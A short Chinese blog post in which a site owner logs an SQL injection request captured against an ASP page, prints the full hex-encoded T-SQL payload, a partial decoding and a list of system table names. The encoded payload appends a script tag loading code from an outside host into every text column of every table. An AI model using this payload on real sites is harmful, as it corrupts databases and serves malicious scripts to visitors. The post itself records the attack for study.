学点安全|抓到的一个 SQL Injection 包 c|server|table|sql

最近网站一直被骚扰，只有记录一下这些无聊哥们的手段。我也学习学习。
注射串：

221.229.160.232
/index.asp
【学点安全|抓到的一个 SQL Injection 包】'; DECLARE @S CHAR(4000); SET @S
CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F696D6167652E706F73742E746F6D2E636F6D2F41727469636C65496D6167652F3231332F3536332F4243303030393732323030382F303731352F313231363131333235332E6A7067223E3C2F7363726970743E3C212D2D2727776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F696D6167652E706F73742E746F6D2E636F6D2F41727469636C65496D6167652F3231332F3536332F4243303030393732323030382F303731352F313231363131333235332E6A7067223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000)); EXEC(@S);
==========GET==========

解码串：
DECLARE
@T varchar(255),
@C varchar(4000) DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROMTab

结果串：
spt_values name
spt_fallback_db xserver_name
spt_fallback_db name
spt_fallback_dev xserver_name
spt_fallback_dev name
spt_fallback_dev phyname
spt_fallback_usg xserver_name
spt_provider_types type_name
spt_provider_types literal_prefix
spt_provider_types literal_suffix
spt_provider_types local_type_name
spt_datatype_info_ext CREATE_PARAMS
spt_datatype_info_ext typename
MSreplication_options optname
spt_datatype_info TYPE_NAME
spt_datatype_info LITERAL_PREFIX
spt_datatype_info LITERAL_SUFFIX
spt_datatype_info CREATE_PARAMS
spt_datatype_info LOCAL_TYPE_NAME
spt_server_info attribute_name
spt_server_info attribute_value

学点安全|抓到的一个 SQL Injection 包

推荐阅读

开机一直转圈

2月20日台州玉环清港镇卫生院九价预约条件一览

电商是什么什么是电商商机，商机好项目

南昌地铁规划以后南昌也有地铁啦

手机|华为P50确认全球发布，并带来全新影像技术，超越自己

游戏开发游戏运营内容，游戏开发运营公司的流程场景描述

mongodb如何修改密码 mongodb 密码连接

教育者谬误手册心得体会

如何处理债权人不同意债务转让的情况？

为患者做雾化怎么样雾化

坐高铁可以带黄酒上高铁吗坐高铁可以带黄酒吗?

八个字的生日祝福语有哪些？

安卓淘宝手机客户端,淘宝客户端下载安装步骤一文看懂

西山有什么风景西山有哪些

ie80s

带云的诗句关于云的诗句

翡翠手串的寓意翡翠手串的寓意介绍

槐鹅是什么样子，和大白鹅有什么区别

核酸检测阴性怎么还是黄码

蚂蚁庄园登山赛怎么找不到蚂蚁庄园登山赛在哪里入口